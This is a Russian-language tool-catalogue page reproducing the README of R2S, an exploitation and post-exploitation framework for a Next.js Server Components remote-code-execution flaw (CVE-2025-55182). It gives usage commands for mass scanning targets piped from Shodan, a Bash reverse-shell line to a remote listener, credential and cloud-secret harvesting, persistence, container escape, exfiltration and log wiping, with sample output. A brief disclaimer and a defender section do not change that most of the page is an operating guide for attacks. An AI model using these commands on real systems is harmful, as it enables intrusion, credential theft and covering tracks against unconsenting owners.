Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
React2Shell — R2S — это комплексный фреймворк для эксплуатации и пост-эксплуатации, нацеленный на уязвимость React Server Components в Next.js (CVE-2025-55182). Он предоставляет интерактивную оболочку с расширенными возможностями для тестирования на проникновение, включая передачу файлов, закрепление в системе, перечисление ресурсов, проверки повышения привилегий и многое другое. | Kitploit
Инструменты/GitHubGitHub/4nuxd/react2shell
Фреймворки для пентестаПовышение привилегийФреймворки для эксплойтовМеханизмы персистентностиЛатеральное перемещениеЭксплуатация веб-приложенийЭксфильтрация данныхПост-эксплуатацияКомандование и УправлениеПобег из Контейнера
GitHub
439 месяцев назадЕщё не проверено
4nuxd/react2shell

React2Shell

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

R2S — это комплексный фреймворк для эксплуатации и пост-эксплуатации, нацеленный на уязвимость React Server Components в Next.js (CVE-2025-55182). Он предоставляет интерактивную оболочку с расширенными возможностями для тестирования на проникновение, включая передачу файлов, закрепление в системе, перечисление ресурсов, проверки повышения привилегий и многое другое.

Поделиться

🚀 R2S - Фреймворк эксплуатации Next.js RSC

Version Python License CVE

Продвинутый фреймворк пост-эксплуатации для RCE в React Server Components Next.js

Возможности • Установка • Использование • Команды • Примеры


📋 Обзор

R2S — это комплексный фреймворк эксплуатации и пост-эксплуатации, нацеленный на уязвимость React Server Components Next.js (CVE-2025-55182). Он предоставляет интерактивную оболочку с расширенными возможностями для пентестинга, включая передачу файлов, закрепление, разведку, проверки на повышение привилегий и многое другое.

🎯 Ключевые возможности

  • ✅ Автоматическое сканирование уязвимостей — массовое сканирование нескольких целей
  • ✅ Интерактивная оболочка RCE — выполнение команд с сохранением состояния и навигацией по каталогам
  • ✅ Передача файлов через HTTP — загрузка/скачивание файлов без ограничений base64
  • ✅ Автоматизация реверс-шеллов — попробовать более 25 различных полезных нагрузок
  • ✅ Расширенная разведка — информация о системе, сети, контейнерах и облачных метаданных
  • ✅ Повышение привилегий — автоматическое обнаружение векторов privesc
  • ✅ Сбор учётных данных — извлечение паролей, ключей, токенов и секретов
  • ✅ Механизмы закрепления — сохранение доступа после перезагрузок
  • ✅ Горизонтальное перемещение — обнаружение и переход к другим хостам
  • ✅ Побег из контейнера — проверка на векторы выхода из Docker/Kubernetes
  • ✅ Эксфильтрация данных — извлечение конфиденциальных файлов и конфигураций
  • ✅ Скрытые операции — очистка логов и заметание следов

🔥 Возможности

🌐 Основная эксплуатация

  • Массовое сканирование с поддержкой многопоточности
  • Режим конвейера для интеграции с другими инструментами
  • Автоматическое обнаружение уязвимости Next.js RSC
  • Интерактивная оболочка с сохранением состояния и постоянной рабочей директорией

📁 Файловые операции

  • Загрузка через HTTP — передача файлов на цель с помощью wget/curl
  • Скачивание через HTTP — эксфильтрация файлов через POST-запросы
  • Без ограничений по размеру — работает с большими файлами (в отличие от методов base64)
  • Автоматический HTTP-сервер — запускается/останавливается по мере необходимости

🔍 Разведка и перечисление

  • Системная разведка — ОС, ядро, пользователи, процессы
  • Сетевое обнаружение — интерфейсы, маршруты, ARP, DNS, прослушиваемые порты
  • Обнаружение контейнеров — идентификация Docker, Kubernetes, LXC
  • Облачные метаданные — извлечение учётных данных AWS, GCP, Azure
  • Дамп памяти процессов — извлечение секретов из работающих процессов
  • Поиск интересных файлов — SUID, доступные для записи директории, резервные копии, конфиги

🔐 Сбор учётных данных

  • Переменные окружения (пароли, ключи API, токены)
  • Файлы .env и конфигурационные файлы
  • Приватные ключи SSH и authorized_keys
  • История Bash с чувствительными командами
  • Файлы баз данных (SQLite, дампы MySQL)
  • Облачные учётные данные (AWS, Azure, GCP)
  • Учётные данные Git и токены NPM
  • Данные браузера (куки, данные для входа)
  • Секреты Docker и Kubernetes

⬆️ Повышение привилегий

  • Обнаружение SUID/SGID двоичных файлов
  • Перечисление прав sudo
  • Доступны для записи системные файлы (/etc/passwd, /etc/shadow)
  • Проверка доступа к сокету Docker
  • Анализ возможностей Linux
  • Предложения по эксплуатации ядра
  • Перечисление задач cron
  • Возможности перехвата PATH

🔄 Пост-эксплуатация

  • Механизмы закрепления — задачи cron, .bashrc, службы systemd
  • Расширенное закрепление — LD_PRELOAD, таймеры systemd
  • Сканирование портов — разведка внутренней сети
  • Горизонтальное перемещение — обнаружение ключей SSH, анализ known_hosts
  • Побег из контейнера — проверки привилегированных контейнеров, анализ возможностей
  • Эксфильтрация данных — автоматический сбор конфиденциальных данных
  • Автоматизация реверс-шеллов — более 25 типов нагрузок с автоматическим повтором

🥷 Скрытность и обход

  • Очистка логов — история Bash, логи аутентификации, syslog
  • Заметание следов — очистка wtmp, lastlog
  • Управление сессиями — сохранение и возобновление сессий

🛠️ Установка

Предварительные требования

root@kitploit:~
# Python 3.6 или выше
python3 --version

# Установка зависимостей
pip3 install requests urllib3

Быстрый старт

root@kitploit:~
# Клонируйте или скачайте инструмент
cd r2s-main

# Сделайте исполняемым (опционально)
chmod +x r2s_enhanced.py

# Запустите инструмент
python3 r2s_enhanced.py -h

🚀 Использование

Основной синтаксис

root@kitploit:~
python3 r2s_enhanced.py [ОПЦИИ]

Параметры командной строки

ПараметрОписаниеПо умолчанию
-u, --urlURL одной цели-
-l, --listФайл со списком URL-
-c, --cmdНачальная команда для выполненияid
-t, --threadsКоличество потоков сканирования30
-p, --proxyHTTP-прокси (например, http://127.0.0.1:8080)-
-v, --verboseВключить подробный выводFalse
--http-portПорт HTTP-сервера для передачи файлов8000

Способы ввода

1. Одна цель

root@kitploit:~
python3 r2s_enhanced.py -u http://target.com

2. Несколько целей (файл)

root@kitploit:~
python3 r2s_enhanced.py -l targets.txt -t 50

3. Режим конвейера (stdin)

root@kitploit:~
cat targets.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d example.com | httpx | python3 r2s_enhanced.py

💻 Команды интерактивной оболочки

Получив доступ RCE, вы войдёте в интерактивную оболочку со следующими командами:

📂 Передача файлов

root@kitploit:~
upload <local_file> <remote_path>    # Загрузить файл на цель
download <remote_file> <local_path>  # Скачать файл с цели

🧭 Навигация

root@kitploit:~
cd <directory>                       # Сменить рабочую директорию
pwd                                  # Показать текущую директорию

🔍 Разведка

root@kitploit:~
enum                                 # Полная разведка системы
privesc                              # Проверки на повышение привилегий
harvest                              # Сбор учётных данных
portscan <ip>                        # Сканирование портов внутренней сети
memdump [pid]                        # Дамп памяти процесса для поиска секретов

🎯 Пост-эксплуатация

root@kitploit:~
lateral                              # Возможности горизонтального перемещения
escape                               # Векторы побега из контейнера
exfil [type]                         # Эксфильтрация данных (env/config/keys/db/logs/all)
reverse <lhost> <lport>              # Попробовать несколько полезных нагрузок реверс-шелла

🔒 Закрепление

root@kitploit:~
persist                              # Добавить базовое закрепление
advpersist                           # Добавить расширенное закрепление

🥷 Скрытность

root@kitploit:~
stealth                              # Очистить логи и заметать следы

💾 Управление сессиями

root@kitploit:~
save                                 # Сохранить текущую сессию
help, ?                              # Показать справку
exit, quit                           # Выйти из интерактивной оболочки

🖥️ Системные команды

Выполняйте любые команды оболочки напрямую:

root@kitploit:~
whoami
id
uname -a
ps aux
netstat -tulpn
cat /etc/passwd

📚 Примеры

Пример 1: Базовая эксплуатация

root@kitploit:~
$ python3 r2s_enhanced.py -u http://vulnerable-app.com

    _   __          __  ____            
   / | / /__  _  __/ /_/ __ \________   
  /  |/ / _ \| |/_/ __/ /_/ / ___/ _ \  
 / /|  /  __/>  </_ _/ _, _/ /__/  __/  
/_/ |_/\___/_/|_|\__/_/ |_|\___/\___/   

   Next.js RSC Exploit Tool (CVE-2025-55182)
   Mass Scanner & Pipeline Edition (v4.1.0 - Enhanced)

   >> CREDIT( G4rxd )

[*] Загружена 1 цель. Запуск сканирования с 30 потоками...
[*] Команда полезной нагрузки: id

[VULN] http://vulnerable-app.com >>> RCE УСПЕХ
       Вывод: uid=1000(node) gid=1000(node) groups=1000(node)

[+] Запущена интерактивная оболочка RCE с сохранением состояния. Введите 'help' для списка команд.
[*] Расширенные возможности: enum, privesc, persist, portscan, harvest, stealth
[*] Новые возможности: memdump, lateral, escape, exfil, advpersist, reverse

[+] HTTP-сервер запущен на 192.168.1.100:8000

next-rce:/app$

Пример 2: Разведка системы

root@kitploit:~
next-rce:/app$ enum

[*] Запуск автоматизированной разведки...

============================================================
[*] Информация о системе
============================================================
Linux 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="22.04.3 LTS (Jammy Jellyfish)"

============================================================
[*] Текущий пользователь
============================================================
node
uid=1000(node) gid=1000(node) groups=1000(node),27(sudo)

============================================================
[*] Обнаружение контейнера
============================================================
12:devices:/docker/a1b2c3d4e5f6
11:cpuset:/docker/a1b2c3d4e5f6
[Обнаружен контейнер Docker]

...

Пример 3: Передача файлов

root@kitploit:~
# Загрузка файла
next-rce:/app$ upload /tmp/exploit.sh /var/tmp/exploit.sh
[*] Загрузка /tmp/exploit.sh (2048 байт) через HTTP...
[+] Загрузка успешна!
    -rwxr-xr-x 1 node node 2048 Dec 12 03:28 /var/tmp/exploit.sh

# Скачивание файла
next-rce:/app$ download /etc/passwd ./passwd.txt
[*] Скачивание /etc/passwd через HTTP...
[+] Скачивание успешно! (1523 байт)
    Сохранено в: ./passwd.txt

Пример 4: Сбор учётных данных

root@kitploit:~
next-rce:/app$ harvest

[*] Сбор учётных данных...

[*] Переменные окружения:
DATABASE_PASSWORD=super_secret_pass
API_KEY=sk-1234567890abcdef
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

[*] Файлы .env:
/app/.env
/app/.env.production
/var/www/.env.local

[*] SSH-ключи:
/home/node/.ssh/id_rsa
/root/.ssh/id_rsa

...

Пример 5: Реверс-шелл

root@kitploit:~
next-rce:/app$ reverse 192.168.1.100 4444

[*] Запуск попыток реверс-шелла на 192.168.1.100:4444
[!] Убедитесь, что у вас запущен слушатель: nc -lvnp 4444

[*] Попытка 25 различных полезных нагрузок реверс-шелла...

[1/25] Попытка Bash TCP... ✓ Выполнено
[?] Получено соединение? (y/n/s для остановки): y

[+] УСПЕХ! Реверс-шелл установлен с помощью: Bash TCP
[*] Полезная нагрузка: bash -i >& /dev/tcp/192.168.1.100/4444 0>&1

Пример 6: Массовое сканирование

root@kitploit:~
$ cat targets.txt
http://app1.example.com
http://app2.example.com
http://app3.example.com

$ python3 r2s_enhanced.py -l targets.txt -t 50

[*] Загружено 3 цели. Запуск сканирования с 50 потоками...

[VULN] http://app1.example.com >>> RCE УСПЕХ
[VULN] http://app3.example.com >>> RCE УСПЕХ

[*] Сканирование завершено.

Пример 7: Проверка повышения привилегий

root@kitploit:~
next-rce:/app$ privesc

[*] Проверка векторов повышения привилегий...

[*] SUID-бинарники:
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

[*] Права sudo:
Пользователь node может выполнять следующие команды:
    (ALL : ALL) NOPASSWD: /usr/bin/docker

[*] Сокет Docker:
srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock

[*] Группа docker:
В группе docker — ЭКСПЛУАТИРУЕМО!

...

Пример 8: Побег из контейнера

root@kitploit:~
next-rce:/app$ escape

[*] Проверка векторов побега из контейнера...

[*] Тип контейнера:
12:devices:/docker/a1b2c3d4e5f6

[*] Привилегированный контейнер:
PRIVILEGED

[*] Сокет Docker:
srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock

[*] Возможности:
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
[Полные возможности — контейнер привилегированный]

...

🔧 Расширенные возможности

Полезные нагрузки реверс-шелла

Инструмент включает более 25 полезных нагрузок реверс-шелла на нескольких языках и техниках:

  • Bash (TCP, UDP, варианты exec)
  • Netcat (традиционный, mkfifo, OpenBSD)
  • Python/Python3 (socket, pty)
  • Perl (несколько вариантов)
  • PHP (exec, system, passthru)
  • Ruby (варианты socket)
  • Node.js (child_process, socket)
  • Socat, Telnet, AWK
  • Golang, OpenSSL

Извлечение облачных метаданных

Автоматически обнаруживает и извлекает учётные данные из:

  • AWS — роли IAM, секретные ключи безопасности
  • GCP — токены сервисных аккаунтов
  • Azure — метаданные экземпляра
  • Переменные окружения с облачными учётными данными

Обнаружение контейнеров

Идентифицирует и анализирует:

  • Контейнеры Docker
  • Поды Kubernetes
  • Контейнеры LXC
  • Привилегированные и непривилегированные
  • Доступные векторы побега

⚠️ Правовое предупреждение

ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И АВТОРИЗОВАННЫХ ТЕСТОВ

Этот инструмент предоставляется исключительно для образовательных целей и авторизованного пентестинга. Использование этого инструмента для атак на цели без предварительного обоюдного согласия незаконно. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.

Требования для законного использования:

  • ✅ Письменное разрешение от владельца цели
  • ✅ Определённые рамки и правила взаимодействия
  • ✅ Профессиональное пентестинговое задание
  • ❌ Несанкционированный доступ к системам
  • ❌ Злонамеренные намерения или ущерб

🛡️ Обнаружение и защита

Для защитников

Обнаружение:

  • Отслеживайте необычные заголовки Next-Action
  • Ищите POST-запросы с multipart/form-data к несуществующим конечным точкам
  • Проверяйте ответы с ошибками на наличие закодированного в base64 вывода команд
  • Отслеживайте child_process.execSync в логах Next.js

Смягчение:

  • Обновите Next.js до последней исправленной версии
  • Внедрите правила Web Application Firewall (WAF)
  • Ограничьте выполнение серверного кода
  • Отслеживайте и регистрируйте все запросы RSC
  • Реализуйте надлежащую проверку ввода

📊 История версий

v4.1.0 (текущая) — расширенная версия

  • ✅ Добавлена автоматизация реверс-шеллов (25+ нагрузок)
  • ✅ Добавлены возможности дампа памяти
  • ✅ Добавлено обнаружение горизонтального перемещения
  • ✅ Добавлены проверки побега из контейнера
  • ✅ Добавлена автоматизация эксфильтрации данных
  • ✅ Добавлены расширенные механизмы закрепления
  • ✅ Улучшена передача файлов по HTTP
  • ✅ Улучшены функции разведки
  • ✅ Улучшена обработка ошибок и UX

v4.0.0 — Фреймворк пост-эксплуатации

  • ✅ Передача файлов по HTTP
  • ✅ Механизмы закрепления
  • ✅ Сканер портов
  • ✅ Проверки повышения привилегий
  • ✅ Сетевая разведка
  • ✅ Сбор учётных данных
  • ✅ Управление сессиями
  • ✅ Автоматизированная разведка
  • ✅ Функции скрытности

v3.0.0 — Интерактивная оболочка

  • Оболочка с сохранением состояния и навигацией по каталогам
  • Базовая передача файлов (base64)
  • Улучшенная обработка ошибок

🤝 Вклад

Вклад приветствуется! Пожалуйста, убедитесь, что все вклады предназначены только для образовательных и защитных целей безопасности.


👨‍💻 Автор

G4rxd


🙏 Благодарности

  • Команда открытия CVE-2025-55182
  • Сообщество исследователей безопасности Next.js
  • Сообщество инструментов безопасности с открытым исходным кодом

📄 Лицензия

Этот проект лицензирован только для образовательных и авторизованных целей тестирования.


⚡ Этичного вам хакинга! ⚡

Помните: с большой силой приходит большая ответственность.

Скачать инструмент